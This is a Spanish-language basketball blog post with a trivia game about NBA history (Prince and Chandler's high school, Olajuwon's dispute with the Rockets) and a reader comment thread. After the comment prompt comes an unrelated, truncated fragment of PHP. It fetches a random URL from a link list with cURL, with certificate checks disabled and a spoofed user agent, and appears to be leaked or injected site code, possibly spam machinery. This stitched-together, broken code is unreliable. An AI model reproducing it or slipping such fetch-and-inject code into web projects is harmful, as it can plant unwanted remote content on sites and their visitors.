Trivial: Tayshaun Prince y Tayson Chandler compañeros de instituto

29 de June de 2011 por txusma

No duró mucho la primera pregunta del Trivial de la nueva temporada. Efectivamente, la respuesta correcta era Tayshaun Prince y el nombre del instituto al que fueron ambos era el “Instituto Domínguez” de Californía. A pesar de ser 2 años más joven, Chandler fue escogido en el draft un año antes que Prince, que cumplió los 4 años de su periplo universitario en Kentucky.

Lo curioso es la manera en que nuestro compañero Blade conoció el dato. Jugando al NBA Live 2008, en un momento dado Tyson Chandler recibe una falta y Antonie Daimiel, en su faceta de análista suelta-datos, dice “Tyson Chandler, nº 2 del draft del 2001 que se graduó en el instituto Domínguez de Californía. El mismo que Tayshun Prince”. Para que luego digan que no se puede aprender nada de los videojuegos.

Por cierto, el instituto Domínguez produce muy buenos jugadores de baloncesto. Aparte de Chandler y Prince también pasaron por el Domínguez Cedric Ceballos, Dennis Johnson y Brandon Jennings.

Vamos ya con la pregunta que nos propone ‘jas’, el acertante anterior. Sin embargo, antes vamos a adoptar una idea que ha propuesto ‘Sempren’. Solo se permite una respuesta por persona y día. Así evitamos que alguien pueda responder 3 veces en el plazo de 5 minutos, rectificando o completando respuestas anteriores.


“Si tuviéramos que decidir cuál ha sido el equipo más destacado durante la década de los 90, no habría ninguna que serían los bulls pero hay otro equipo que también puede estar muy satisfecho por los logros conseguidos durante dicha década. Estoy hablando de los Houston Rockets, con el gran Hakeem Olajuwon a la cabeza, el cual lideró al equipo hasta lo mas alto durante dos temporadas consecutivas (93/94-94/95). Lo que no tanta gente sabe es que esta situación estuvo muy cerca de no producirse, ya que, apenas un año antes, la salida de Olajuwon de los Rockets estaba más que cantada. Una serie de acusaciones vertidas por los entonces GM y propietario de la franquicia texana en las que acusaban al jugador de poco profesional llevaron a Hakeem a pedir publicamente su salida del equipo.

Ese mismo verano, buscando un poco de paz el jugador se exilió a un famoso gimnasio de Los Angeles, donde entrenó con una jovencísima futura estrella de la NBA.

Por suerte (no para Knicks ni Magic que estaban muy interesados, jaja), esta situación consiguió arreglarse de una manera un tanto peculiar, gracias a una ”reunión” que mantuvieron el jugador y el propietario de los Rockets en extrañas circunstancias.

Mis preguntas son:

-¿Qué hechos llevaron a los dirigentes de los Houston a verter dichas acusaciones?
-¿Cuál es el nombre del gimnasio angelino y con qué otro jugador coincidió?
-¿Dónde se produjo la reunión de la que hablo en el último párrafo?”

jas

Comenta

13 comentarios a esta entrada

  1. dsromero dice:
    #1

    El motivo fue que mientras el solicitaba renegociar su contrato y la directiva le daba largas, Olajuwon en el transcurso de un partido se quejo de dolor en una pierna y le acusaron de estar fingiendo, los medicos no le encontraron nada, se nego a jugar, lo amenazaron con suspenderlo de empleo y sueldo …. y al acabar la temporada dijo que no queria jugar más allí.

    El gimnasio era Gold’s Gym y entrenó con Shaquille O’Neal

    Y la reunión fue en un avión camino de Japón

    todas las respuestas las había leido en este artículo de Gonzalo Vazquez: http://blogs.acb.com/blog/elpuntog/post/houston-tuvimos-un-problema

      Citar

  2. AndiD dice:
    #2

    Bravo! Gran pregunta. Y la respuesta ha sido también muy rápida.

      Citar

  3. dsromero dice:
    #3

    Cuando lei el post me acorde rapidamente de que habia leido la historia en un articulo de Punto G así que fue facil encontar el articulo y por tanto las respuestas 🙂

    si no has leido el articulo, la verdad es que es muy muy bueno, como casi todos los de Gonzalo Vazquez, es una recomendación personal 😛

      Citar

  4. jas dice:
    #4

    Ya sabia yo que alguien lo habria leido.
    Gonzalo Vazquez es un crack me encanta su blog, y cuando supe que tenia la responsabilidad de hacer una pregunta sabia que tenia que ponerla sobre alguno de sus articulos.
    Para quien no lo conozca http://blogs.acb.com/blog/elpuntog

      Citar

  5. Natania Mendoza dice:
    #5

    Interesante blog para los que seguimos el baloncesto! Felicitaciones y quiero participar de las trivias ¿cómo hago? ¿cuando es la próxima ?

      Citar

  6. Txusma dice:
    #6

    Pues parece que ya tenemos ganador.
    dsromero, tu turno. Y cuidado con utilizar información de un blog muy conocido de internet!

      Citar

  7. Bladse Petrovic dice:
    #7

    Y yo que creía que m trivial iba a durar cinco minutos i a durado bastantes respuestas

      Citar

  8. dsromero dice:
    #8

    dos cosillas, primero una sugerencia para mejorar vuestro blog, ya que usais wordpress podríais activar la opción para recibir notificaciones de los comentarios de una entrada, haría mucho más comodo seguir las conversaciones y sale gratis 😉

    la segunda es que no tengo muy claro como tengo que proponer la siguiente pregunta del trivial.

      Citar

  9. TheDeerHunter dice:
    #9

    @Natania Mendoza: es simplemente estar al loro de cuando se cuelgan las preguntas y responder a discrección.
    Firmo las sugerencias que se han hecho en este post

      Citar

  10. Txusma dice:
    #10

    @dsromero Puedes enviar la siguiente pregunta a txusma@tjnba.com. Recuerda de incluir tb una respuesta un tanto elaborado (1 ó 2 párrafos).

    Sobre la sugerencia si la mayoría de gente está de acuerdo, por mi adelante.

      Citar

  11. dsromero dice:
    #11

    pues este fin de semana me buscaré una pregunta e intentaré redactar una respuesta minimamente en condiciones para enviarte.

    saludos!

      Citar

  12. dsromero dice:
    #12

    por cierto, una duda que me acaba de venir ahora mismo, al ser un blog de wordpress no hay alguna manera para poder comentar con mi usuario wordpress sin tener que poner nombre y mail en cada comentario?

      Citar

  13. Txusma dice:
    #13

    Este verano es posible que renovemos un poco el blog ofreciendo, por ejemplo, comentarios anidados (no sé si os gustará la idea). Cuando hagamos el cambio intentaremos dar respuesta a todas las sugerencias.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>